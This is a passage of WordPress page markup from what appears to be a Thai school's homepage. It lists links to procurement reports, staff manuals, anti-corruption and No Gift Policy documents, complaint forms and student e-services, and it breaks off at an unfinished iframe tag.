data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe 